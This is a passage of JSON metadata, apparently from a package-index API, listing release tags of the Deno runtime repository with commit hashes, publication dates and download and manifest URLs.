parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"1ba09320aa4ef7362ec33ec332e6e6d38c75d2b5","kind":"commit","published_at":"2025-12-15T16:45:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"d5b1548eba893d4cc26305f33739a6ca2e6e8c11","kind":"commit","published_at":"2025-12-10T13:29:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.0/manifests"},{"name":"v2.5.6","sha":"1b5f3112af364a3327b26f720746819c4f20f20d","kind":"commit","published_at":"2025-10-29T23:50:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.6/manifests"},{"name":"v2.5.5","sha":"367ecdd0360e935de0454c70e0018be61c02904e","kind":"commit","published_at":"2025-10-28T16:40:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.5/manifests"},{"name":"v2.5.4","sha":"6fbce91e40cc07fc6da74068e5cc56fdd40f7b4c","kind":"commit","published_at":"2025-10-09T09:41:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.4/manifests"},{"name":"v2.5.3","sha":"1c3d04cfaf50a4a0db7a1925c0a73af5ea89bc69","kind":"commit","published_at":"2025-10-03T02:05:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.3/manifests"},{"name":"v2.2.15","sha":"5f6b1329dfd377ff03a389fb32faf73bb966e81d","kind":"commit","published_at":"2025-09-30T18:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.15","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.15/manifests"},{"name":"v2.1.14","sha":"b8ae1323051c14a66a1c88434aa0f1e49f960c10","kind":"commit","published_at":"2025-09-29T15:06:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.14/manifests"},{"name":"v2.5.2","sha":"02787156398518fdac51b1f633a8367f92a7d253","kind":"commit","published_at":"2025-09-24T19:42:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.2/manifests"},{"name":"v2.5.1","sha":"4c1cdfc9a4f3c8919d25d1b2fe01981025babec5","kind":"commit","published_at":"2025-09-16T23:58:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"c6adba122836aeddd92800c45282897e1f508bd3","kind":"commit","published_at":"2025-09-10T05:10:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"b7061b0f64b3c79b312de5a59122b7184b2fdef2","kind":"commit","published_at":"2025-08-21T11:41:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.5/manifests"},{"name":"v2.4.4","sha":"5129d036ebd51b229adb7579e2c805859e3f95c0","kind":"commit","published_at":"2025-08-13T20:26:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.4/manifests"},{"name":"v2.4.3","sha":"5612d2edc7262d7bfb3bcfb0f18649b01ec94b53","kind":"commit","published_at":"2025-07-30T22:25:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"622c3513936c1614ee316516a31343729c3c4367","kind":"commit","published_at":"2025-07-16T10:51:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.2/manifests"},{"name":"v2.2.14","sha":"ec5368efefd1fbdfe0c83a20237b5117d1291c11","kind":"commit","published_at":"2025-07-16T09:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.14/manifests"},{"name":"v2.4.1","sha":"c03199ea1e4e22d44aad0deafc634be82e5b841b","kind":"commit","published_at":"2025-07-08T05:15:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"45dfae18eec45c91146231aa05f4b249378691b5","kind":"commit","published_at":"2025-07-01T20:21:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.4.0/manifests"},{"name":"v2.3.7","sha":"0d76cd50af2b21e0ac772bb5219199e32a8f312d","kind":"commit","published_at":"2025-06-23T21:51:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.7/manifests"},{"name":"v2.3.6","sha":"d2d8d3775fe0fbb34de08421f612ded43dea4473","kind":"commit","published_at":"2025-06-12T12:33:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.6/manifests"},{"name":"v2.3.5","sha":"4794dc147e51c75cfa501d39da72cbd0ecb9b068","kind":"commit","published_at":"2025-05-30T11:01:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.5/manifests"},{"name":"v2.3.4","sha":"37ba6223b6733c4b18d4727c23f6831558c0ccc8","kind":"commit","published_at":"2025-05-29T22:48:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.4/manifests"},{"name":"v2.3.3","sha":"395878c5fb72d87a44f7c88ce9f391acc31feab3","kind":"commit","published_at":"2025-05-16T11:37:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"7b74f385396bded16f99db64b97aa48e6f603f16","kind":"commit","published_at":"2025-05-15T23:18:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.2/manifests"},{"name":"v2.2.13","sha":"0117f27aef98e1bf9a8689fe5ab6b03b5a1453f7","kind":"commit","published_at":"2025-05-13T20:00:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.13/manifests"},{"name":"v2.1.13","sha":"5b85bdaf88e36a1fcae3e442d96f026e4e1f9b92","kind":"commit","published_at":"2025-05-13T19:41:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.13/manifests"},{"name":"v2.3.1","sha":"8773b5f5b074e1e374a403d05943b6a7bbbdebad","kind":"commit","published_at":"2025-04-30T10:48:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"61574bb9c9c255d5c661add6c7464af30475c197","kind":"commit","published_at":"2025-04-30T07:49:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.3.0/manifests"},{"name":"v2.2.12","sha":"81da8139af85a0cb7efa9050ae6b5461b3614077","kind":"commit","published_at":"2025-04-24T20:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.12/manifests"},{"name":"v2.2.11","sha":"225fbd59bf9a1d50603adb99fe2748edf70b9de2","kind":"commit","published_at":"2025-04-18T12:16:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.11/manifests"},{"name":"v2.2.10","sha":"adc34a6b3b8f6ff593810c0655d0d1a4b7ea3729","kind":"commit","published_at":"2025-04-14T20:59:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.10/manifests"},{"name":"v2.1.12","sha":"16b18e2b8dddde755364b740d63aa7da3646b33c","kind":"commit","published_at":"2025-04-11T23:06:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.12/manifests"},{"name":"v2.2.9","sha":"25defa74d539d1d6fd27ddabd5260705677c43e8","kind":"commit","published_at":"2025-04-11T18:52:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.9/manifests"},{"name":"v2.1.11","sha":"d73d467148cff810ccf9c96bed9bcaf32ce5281c","kind":"commit","published_at":"2025-04-08T23:54:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.11/manifests"},{"name":"v2.2.8","sha":"32b9cc91d8c343bdec2ddcf3cedb27b5efc2f5e4","kind":"commit","published_at":"2025-04-05T01:17:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.8/manifests"},{"name":"v2.2.7","sha":"e7dab411533fd7240fd794398ba9d9590e28f69d","kind":"commit","published_at":"2025-04-04T08:05:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.7/manifests"},{"name":"v2.2.6","sha":"2037200c4bc903162cd16b71b2564ab5bcd0601e","kind":"commit","published_at":"2025-03-28T05:25:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.6/manifests"},{"name":"v2.2.5","sha":"6e08a9d2291cf45ae4031e163b8c1a03a0e85983","kind":"commit","published_at":"2025-03-21T05:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.5/manifests"},{"name":"v2.2.4","sha":"33132abbd9ee0defa4bf0332c4797ee4341a03fc","kind":"commit","published_at":"2025-03-14T19:06:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.4/manifests"},{"name":"v2.2.3","sha":"8203278401f4ffcb477a28b3ae9b915d88de7dd7","kind":"commit","published_at":"2025-03-05T04:00:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.3/manifests"},{"name":"v2.2.2","sha":"b2e5efd3826974857f4e5a94d87c2c724fa5bf5d","kind":"commit","published_at":"2025-02-25T07:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.2/manifests"},{"name":"v2.2.1","sha":"6057bc30da1df2b247f584b5280e1f10c02eec75","kind":"commit","published_at":"2025-02-20T23:41:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"29688168631edb677a444ba3cd02b2be21304a1f","kind":"commit","published_at":"2025-02-18T23:12:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.2.0/manifests"},{"name":"v2.1.10","sha":"073e0879791486f70c7ac99d2d100c3fca6ac461","kind":"commit","published_at":"2025-02-13T06:33:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.10/manifests"},{"name":"v2.1.9","sha":"46e2f9a47ee5293547efd089438db29690a05f85","kind":"commit","published_at":"2025-01-31T00:21:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.9/manifests"},{"name":"v2.1.8","sha":"318646f7678111d24b139f4c589a4ef447c8cf1c","kind":"commit","published_at":"2025-01-30T18:19:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.8/manifests"},{"name":"v2.1.7","sha":"379079d9049499af660b70423aa7cc3aca0d5e52","kind":"commit","published_at":"2025-01-22T00:51:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.1.7/manifests"},{"name":"v2.1.6","sha":"4ee86d8d125c7b36570e87f0725eb82b6fe4a4b4","kind":"commit","published_at":"2025-01-16T23:35:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.1.6","tag_url":"https:/